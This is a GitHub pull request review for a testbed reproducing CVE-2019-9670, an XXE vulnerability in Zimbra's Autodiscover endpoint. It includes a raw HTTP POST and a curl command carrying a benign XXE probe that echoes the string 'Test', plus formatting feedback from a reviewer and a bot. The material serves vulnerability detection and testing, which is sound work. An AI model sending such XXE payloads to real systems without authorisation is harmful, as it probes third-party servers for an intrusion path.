
Testbed for CVE-2019-9670 - Synacor Zimbra XXE #113

Open
wants to merge 4 commits into
base: main

Conversation

LeonardoE95
Contributor

Hello there,

this PR contains the instructions required to set up a testbed for CVE-2019-9670.


@giacomo-doyensec giacomo-doyensec left a comment


Hello @LeonardoE95, thanks for your contribution!
The testbed is working, and the reproduction steps are clear. Please review the provided suggestions, and if they seem appropriate, feel free to apply them.

Comment on lines 34 to 50
To test out the vulnerability, the following HTTP GET request can be used.

Request

```
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 127.0.0.1
Content-Type: application/xml
Content-Length: 177

<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe "Test"> ]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
```


Please provide a cURL command to easily reproduce the vulnerability without requiring an intercepting proxy

Suggested change
To test out the vulnerability, the following HTTP GET request can be used.
Request
```
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 127.0.0.1
Content-Type: application/xml
Content-Length: 177
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe "Test"> ]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
```
## Reproduction Steps
To test out the vulnerability, the following curl command can be used:
```
curl -k -X $'POST'\
--data-binary $'<!DOCTYPE foo [<!ELEMENT foo ANY>\x0d\x0a<!ENTITY xxe \"Test\"> ]>\x0d\x0a<Request>\x0d\x0a<EMailAddress>email</EMailAddress>\x0d\x0a<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\x0d\x0a</Request>' \
$'https://{service-host}:{port}/Autodiscover/Autodiscover.xml'
```
which will generate a POST request similar to the one reported below:
```
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Content-Type: application/xml
Content-Length: 177
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe "Test"> ]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
```
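Review bot: the curl command in the suggested Reproduction Steps sends no `Content-Type` header, so `--data-binary` will default to `application/x-www-form-urlencoded`, while the request shown as its expected result carries `Content-Type: application/xml`. Add `-H $'Content-Type: application/xml'` to the command so the generated request actually matches the one documented below it. The suggestion also drops the `Host:` line and the blank line between headers and body that the original example had; if the block is meant to show the complete request, keep the header/body separator.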

Contributor Author


Useful feedback, thanks, added the curl command!

Comment on lines 52 to 54
When sent to the vulnerable port (`8443`), the response will contain the string `Test`.

Vulnerable Response


Suggested change
When sent to the vulnerable port (`8443`), the response will contain the string `Test`.
Vulnerable Response
### Vulnerable Response
When sent to the vulnerable instance on port `8443`, the response will contain the string `Test`, as shown in the example below:

Contributor Author


Updated

Comment on lines 75 to 77
When sent to the non vulnerable port (`8500`), the response will not containg the string `Test`.

Non Vulnerable Response


Suggested change
When sent to the non vulnerable port (`8500`), the response will not containg the string `Test`.
Non Vulnerable Response
### Non Vulnerable Response
When sent to the non vulnerable instance on port `8500`, the response will not contain the string `Test`, as shown in the example below:

Contributor Author


Updated

4 participants